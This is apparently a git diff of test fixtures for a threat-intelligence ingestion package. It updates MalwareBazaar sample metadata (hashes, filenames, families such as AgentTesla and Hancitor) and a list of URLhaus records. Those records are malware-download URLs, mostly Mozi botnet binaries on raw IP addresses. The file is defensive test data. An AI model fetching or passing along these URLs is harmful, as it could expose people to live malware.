"{\"md5_hash\":\"ff60107d82dcda7e6726d214528758e7\",\"sha256_hash\":\"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:20\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU\",\"tlsh\":\"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json index 6b9539a7503..4f40d0b8266 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json 
+++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json @@ -56,7 +56,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516703193Z", + "ingested": "2021-12-13T08:40:06.442181300Z", "original": "{\"sha256_hash\":\"5bce7d528c1363104a93fbb5a7fa9bdd991ce929cc09cc7fb29052a68d4fd24b\",\"sha3_384_hash\":\"3b454eb6421d17d093f19292b64d30bf918cb91e9322d0e2d2512857997f574ea2ca5b005133c16f6c33c7cee9c1bd0e\",\"sha1_hash\":\"a71fd0504821092e003f350080a6bcc5fa6a972e\",\"md5_hash\":\"0af07660056a692b7cb82fa329221ddd\",\"first_seen\":\"2021-04-06 20:34:58\",\"last_seen\":null,\"file_name\":\"SALM0BRU.exe\",\"file_size\":399872,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"F9848B24AF932F9BC6CCC1FE50C2D165C9A9F85DD2B1251A73B6CB89FE00544ED2C686\",\"telfhash\":null,\"ssdeep\":\"3072:DsPPK3p+8r5igrL1Tq50cVBDmDJhE9yV4veedHrP6FXK7:D+PL8bronBDmDJ69JeedHriFG\",\"tags\":[\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"15\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -116,7 +116,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516721888Z", + "ingested": "2021-12-13T08:40:06.442192600Z", "original": "{\"sha256_hash\":\"83d0429a2c5f1b611ebc30391eeeb75bebb51212ee1af51dbcf2624b48f9d27f\",\"sha3_384_hash\":\"0a1536add280715320040d5ac5340d3b205d90045ff5c90993b8e909edb9b3e9338b3ffbb3febcaf82584d00d516e8c7\",\"sha1_hash\":\"c454be4eb0892d61a4ad6bac16f97724e73cd795\",\"md5_hash\":\"296aad7075596d21516b30bfbc17fcac\",\"first_seen\":\"2021-04-06 20:32:25\",\"last_seen\":null,\"file_name\":\"PO_NO.ENQUIRY-210604.zip\",\"file_size\":476768,\"file_type_mime\":\"application/zip\",\"file_type\":\"zip\",\"reporter\":\"GovCERT_CH\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"74A4233B9A6D5CA02B224AA69F37537D13A8406300944EAEFD375CA431583056B9F6FF\",\"telfhash\":null,\"ssdeep\":\"12288:j++y4mulTPaYJSaHwvJblQpLGwYeHU9vPpNGd+Zr:j3HPaMtQxblje01pNHZr\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"11\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516727138Z", + "ingested": "2021-12-13T08:40:06.442200600Z", "original": "{\"sha256_hash\":\"f4910ea08d14eeb634084de47cf590d4dc5e554552f111da20d22ae71d7b425b\",\"sha3_384_hash\":\"ee7586cb085fde3c14c9c1bea4635ccb30b1af2020f64e87a9983e61b05026ec9b35255670a3d9ecaab436c4ba302dcc\",\"sha1_hash\":\"bf103996196df8255881127dee103c22fc12bef3\",\"md5_hash\":\"a4838dd31c672122441bebcbf7e9d277\",\"first_seen\":\"2021-04-06 20:12:29\",\"last_seen\":null,\"file_name\":\"DropDll.dat\",\"file_size\":435926,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":\"Hancitor\",\"imphash\":\"0b5a952a025c2783c3126cdb9bef2844\",\"tlsh\":\"0C947D11BA96C473E572163008399F6A17BE7A900B704BDBE3CC097E4E755C24B36BA7\",\"telfhash\":null,\"ssdeep\":\"12288:L2X/txpFDEVkUNglTovKfoLy+hqK/cEUMMlGOG:RzglgLm/9lGOG\",\"tags\":[\"Hancitor\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -248,7 +248,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516731396Z", + "ingested": "2021-12-13T08:40:06.442208500Z", "original": "{\"sha256_hash\":\"e45ffc61a85c2f5c0cbe9376ff215cad324bf14f925bf52ec0d2949f7d235a00\",\"sha3_384_hash\":\"788f61cf45bbc8cad5775de18d0d5f42c4e028af0aaa34c570645efc96af8ebc3d7fe330aaf22ef34d35360bbd4a708c\",\"sha1_hash\":\"a68ca1b41cb93fe2879bb3baeb8e19990758f099\",\"md5_hash\":\"8d7c8b55ac49d241fb7f75a27a5ef8d5\",\"first_seen\":\"2021-04-06 20:07:59\",\"last_seen\":null,\"file_name\":\"vabsheche.py\",\"file_size\":11717,\"file_type_mime\":\"text/x-script.python\",\"file_type\":\"unknown\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"AE3222515C6A881A03B3C66F7992B844FB588303C7116607F6FC86782F79568CAF1BBD\",\"telfhash\":null,\"ssdeep\":\"192:z7X/yHo/yz/yBKiSOINLyhQMYd+LiTfq6LTf3ZoTta3Grj6rg2:z7CIKnNNLwufPfAPq7\",\"tags\":[\"backdoor\",\"python\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"27\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -311,7 +311,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516735173Z", + "ingested": "2021-12-13T08:40:06.442216400Z", "original": "{\"sha256_hash\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4\",\"sha3_384_hash\":\"752e5d56a166227d06f8cbd40cd3f693f543f9c3f798c673c1430957bb7e149a12d9158138fa449479105f472e70f68f\",\"sha1_hash\":\"e8378aede9f26f09b7d503d79a05d67612be15f6\",\"md5_hash\":\"fe185f106730583156f39233f77f8019\",\"first_seen\":\"2021-04-06 20:00:48\",\"last_seen\":null,\"file_name\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4.bin\",\"file_size\":7929856,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"13863341B085EE2EE2CA41BA0DA9C2BD43B63D131E054F677269B72D3EB76E0E7D4144\",\"telfhash\":null,\"ssdeep\":\"196608:KQaeKLOiBEp+uc+iuYmbMdHmN1Rwyd2jecXeaH1pHE+2:oeIOTp+p+iNJC1ChjhXZ1pHz2\",\"tags\":[\"maldoc\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"21\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -378,7 +378,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516739090Z", + "ingested": "2021-12-13T08:40:06.442224300Z", "original": "{\"sha256_hash\":\"2d705f0b76f24a18e08163db2f187140ee9f03e43697a9ea0d840c829692d43c\",\"sha3_384_hash\":\"c82132559381b7b3b184b4ce8c7a58c301a46001621f346b637139f5987dee968ae2ef009a17b2388852b2db15a45b58\",\"sha1_hash\":\"b2da45913353bfc66d189455f9ad80ef26968143\",\"md5_hash\":\"70da6872b6b2da9ddc94d14b02302917\",\"first_seen\":\"2021-04-06 19:58:50\",\"last_seen\":null,\"file_name\":\"winlog.wll\",\"file_size\":131584,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":\"6476b7c4dd55eafbdf922a7ba1e2d5f9\",\"tlsh\":\"A2D38C067790C071DAAF013908799E624B7F7D70DDB49D8B77841A8E69342D0AF3AB27\",\"telfhash\":null,\"ssdeep\":\"1536:2NVi7z0r0lJRn6I8+YDgr1fnWG5Ff0+adgBYlCtMiQMX1c0E4JsWjcdonPv870E1:YM7zh8+Cofnp5eRm6riQ6OZoPv870E\",\"tags\":[\"apt\",\"tonto\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -438,7 +438,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516742587Z", + "ingested": "2021-12-13T08:40:06.442232300Z", "original": "{\"sha256_hash\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606\",\"sha3_384_hash\":\"a3ec981ed158fe08cc2cd97303807cfbed147e59ccfd92fcaa9395c5718b4d9b892d6e9fa6337f5976dc1bd042562fe4\",\"sha1_hash\":\"3d613d5678e43faeea1c636185a0b4c3ec80e742\",\"md5_hash\":\"de80e1d7d9f5b1c64ec9f8d4f5063989\",\"first_seen\":\"2021-04-06 19:58:44\",\"last_seen\":null,\"file_name\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606.bin.sample\",\"file_size\":1088000,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"8635D001BA82C573D5621A35083ADBAA177E7D604F704ADBB3C83B2E5D355C14B32BA7\",\"telfhash\":null,\"ssdeep\":\"24576:WKEiZxl3A4yJJG2dPQQCthXzglgLm/9lGO:WKEGByvGOQQC/XElga/9lGO\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"32\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -510,7 +510,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516745973Z", + "ingested": "2021-12-13T08:40:06.442240100Z", "original": "{\"sha256_hash\":\"84f983067868de50e5b1553782c056c1f5b5118bb2084473ca4b6908f221cd3b\",\"sha3_384_hash\":\"138dc28a74d15c1f9797ce732e99097c8c6db4549cb17cb7b20c1c6738a170328e45aea2d4c3b593912f14a97f521c1d\",\"sha1_hash\":\"00b52e8ca1785d5086703ad8cff1d28fc3354934\",\"md5_hash\":\"2759c73c986c6a757bf9d25621c5595a\",\"first_seen\":\"2021-04-06 19:52:32\",\"last_seen\":null,\"file_name\":\"Purchase Order.8000.scan.pdf...exe\",\"file_size\":752128,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"SnakeKeylogger\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"23F4AE212684C9C0D93E67B4D43584F003BABD16D631F69F6E887C693EB32D2D63B646\",\"telfhash\":null,\"ssdeep\":\"12288:8t11ulRZRLZNh4YeX6f6XmwNShqE73YXy7moh:S11gZpZNmBX06WmAcy7m0\",\"tags\":[\"exe\",\"SnakeKeylogger\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"38\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", 
@@ -582,7 +582,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516749149Z", + "ingested": "2021-12-13T08:40:06.442248100Z", "original": "{\"sha256_hash\":\"0661d87116f44cbd5b5c6bec7fb06c4e5cd5b6ecbc5455d959e65f1ee46c54c8\",\"sha3_384_hash\":\"ed5d03454121d81adf65a01ba90af81b1a7cea052709c22bb9170508069d17242861f85e5546b2cc3efb07c10926368c\",\"sha1_hash\":\"a34fd5e57d75d17bc2d84055ca4752e5ee2e92f5\",\"md5_hash\":\"596b3dbf07a287dcf76860b5e54762c3\",\"first_seen\":\"2021-04-06 19:47:13\",\"last_seen\":null,\"file_name\":\"New Order PO#121012020_____PDF_______.exe\",\"file_size\":836096,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"AgentTesla\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"A505CF712694C9A4FABD53B80434403007F5FE42E232FA9A6FD17C993E72782DA3B655\",\"telfhash\":null,\"ssdeep\":\"12288:qRedcNeqimzAEmN03VgdZfBOMx+RVBM7pdWje9ppB5nAZGNY2:ZaNeqikqN0udZfBFUYp55nFN\",\"tags\":[\"AgentTesla\",\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"40\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log index e8099fa73aa..70200de40b7 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log 
@@ -1,56 +1,56 @@
-{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://103.72.223.103:34613/Mozi.m","url_status":"online","host":"103.72.223.103","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]}
-{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://112.30.97.184:44941/Mozi.m","url_status":"online","host":"112.30.97.184","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]}
-{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://113.110.198.53:37173/Mozi.m","url_status":"online","host":"113.110.198.53","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]}
-{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://101.20.183.170:47545/Mozi.m","url_status":"online","host":"101.20.183.170","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]}
-{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://59.8.35.22:44782/Mozi.a","url_status":"online","host":"59.8.35.22","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://59.96.37.35:44359/Mozi.a","url_status":"online","host":"59.96.37.35","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://42.239.233.17:56507/Mozi.m","url_status":"online","host":"42.239.233.17","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://58.252.178.20:57562/Mozi.m","url_status":"online","host":"58.252.178.20","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://45.176.111.95:48845/Mozi.m","url_status":"online","host":"45.176.111.95","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://42.224.68.97:58245/Mozi.m","url_status":"online","host":"42.224.68.97","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://222.81.144.207:37198/Mozi.m","url_status":"online","host":"222.81.144.207","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://182.127.185.137:33524/Mozi.m","url_status":"online","host":"182.127.185.137","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://39.84.175.185:48261/Mozi.a","url_status":"online","host":"39.84.175.185","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://27.41.11.238:34478/Mozi.m","url_status":"online","host":"27.41.11.238","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://182.127.133.68:35703/Mozi.a","url_status":"online","host":"182.127.133.68","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://27.46.44.102:48666/Mozi.m","url_status":"online","host":"27.46.44.102","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://39.70.88.65:53923/Mozi.m","url_status":"online","host":"39.70.88.65","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://42.224.136.237:52794/Mozi.m","url_status":"online","host":"42.224.136.237","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://117.208.135.63:49312/Mozi.a","url_status":"offline","host":"117.208.135.63","date_added":"2021-01-14 21:05:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]}
-{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://125.47.66.60:38961/Mozi.m","url_status":"online","host":"125.47.66.60","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://182.117.95.148:50420/Mozi.a","url_status":"online","host":"182.117.95.148","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://117.202.71.48:55007/Mozi.m","url_status":"online","host":"117.202.71.48","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://125.99.132.118:51143/Mozi.m","url_status":"online","host":"125.99.132.118","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://182.114.123.69:41003/Mozi.m","url_status":"online","host":"182.114.123.69","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://116.19.127.37:35739/Mozi.m","url_status":"offline","host":"116.19.127.37","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]}
-{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://42.239.253.55:45653/Mozi.m","url_status":"offline","host":"42.239.253.55","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]}
-{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://103.217.121.228:41349/Mozi.m","url_status":"offline","host":"103.217.121.228","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]}
-{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://111.92.81.255:48586/Mozi.m","url_status":"offline","host":"111.92.81.255","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]}
-{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://45.229.55.75:38111/Mozi.m","url_status":"offline","host":"45.229.55.75","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]}
-{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://182.121.242.148:34556/Mozi.m","url_status":"online","host":"182.121.242.148","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://106.115.189.249:59815/Mozi.m","url_status":"online","host":"106.115.189.249","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://182.117.93.110:50587/bin.sh","url_status":"online","host":"182.117.93.110","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://110.251.5.169:48322/Mozi.m","url_status":"online","host":"110.251.5.169","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://101.51.117.186:33317/Mozi.m","url_status":"online","host":"101.51.117.186","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://121.151.78.166:41516/Mozi.m","url_status":"online","host":"121.151.78.166","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://116.72.92.97:57798/Mozi.m","url_status":"online","host":"116.72.92.97","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://27.218.15.209:47671/Mozi.m","url_status":"online","host":"27.218.15.209","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://120.85.171.210:57690/Mozi.m","url_status":"online","host":"120.85.171.210","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]}
-{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://117.251.59.53:50611/i","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 21:04:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://115.58.83.167:34141/Mozi.m","url_status":"online","host":"115.58.83.167","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://94.178.124.83:44399/Mozi.m","url_status":"online","host":"94.178.124.83","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://182.122.75.232:49120/Mozi.m","url_status":"online","host":"182.122.75.232","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 